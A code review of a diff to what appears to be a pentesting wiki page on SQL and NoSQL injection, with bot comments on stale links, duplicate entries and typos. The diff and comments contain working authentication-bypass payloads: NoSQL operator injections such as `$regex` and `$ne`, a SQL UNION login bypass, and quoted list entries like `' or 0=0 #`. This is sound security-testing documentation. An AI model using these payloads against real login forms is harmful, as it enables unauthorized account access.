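Review bot: The new page is a title followed by a single `text` block that makes up nearly all of its 779 lines, with no introduction, so the usage guidance lives only on other pages: nothing here says which login fields the entries are meant for, or that the `Pass1234.` entries near the end assume that value as the password. Add a short paragraph above the block. Within the list, `' or 0=0 #` appears twice, and several entries contain typographic characters (`–`, `′`) where the neighbouring entries use `--` and `'`, for example `' –` and `'or'1=1′`, which looks like copy-paste autoformatting; deduplicate and confirm those entries are intended as written.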
@ -26,6 +26,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
|
||||
```bash
|
||||
#in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
username[$regex]=.*&password[$regex]=.*
|
||||
username[$exists]=true&password[$exists]=true
|
||||
|
||||
#in JSON
|
||||
|
@ -258,19 +258,13 @@ We have already discussed all the ways to exploit a SQLinjection vulnerability.
|
||||
* [MySQL](mysql-injection/)
|
||||
* [PostgreSQL](postgresql-injection/)
|
||||
|
||||
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)\*\*\*\*
|
||||
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
|
||||
|
||||
## Authentication bypass
|
||||
|
||||
**Small list recommended**:
|
||||
List to try to bypass the login functionality:
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-authbypass-small.txt" %}
|
||||
|
||||
**Big list recommended** list for login bypass \(please, notice that the small list is already inside the big list\):
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-authbypass-big.txt" %}
|
||||
|
||||
Try to inject each line of the list in the username and password at the same time.
|
||||
{% page-ref page="../login-bypass/sql-login-bypass.md" %}
|
||||
|
||||
### Authentication Bypass \(Raw MD5\)
|
||||
|
||||
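Review bot: With the small and big list attachments replaced by the `page-ref` in the Authentication bypass section, the only usage instruction, "Try to inject each line of the list in the username and password at the same time.", is gone, and the linked page added in this commit does not carry it. Keep that sentence here or move it to sql-login-bypass.md. Also confirm whether `sqli-authbypass-small.txt` and `sqli-authbypass-big.txt` under `.gitbook/assets` are still referenced anywhere; if not, they are orphaned by this change and should be removed in the same commit.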
@ -294,9 +288,10 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
||||
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||
```
|
||||
|
||||
**Recomended list**:
|
||||
**Recommended list**:
|
||||
|
||||
You should use as username each line of the list and as password always: _**Pass1234.**_
|
||||
You should use as username each line of the list and as password always: _**Pass1234.**
|
||||
\(This payloads are also included in the big list mentioned at the beginning of this section\)_
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
|
||||
|
||||
|
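Review bot: The added parenthetical "This payloads are also included in the big list mentioned at the beginning of this section" points at a list that the earlier hunk in this file replaces with a `page-ref`, so the reference is stale on arrival; reword it to name the SQL Login bypass page instead. "This payloads" should be "These payloads", and the italic span now opens on the `Pass1234.` line and closes on the following line, so check that it still renders as intended.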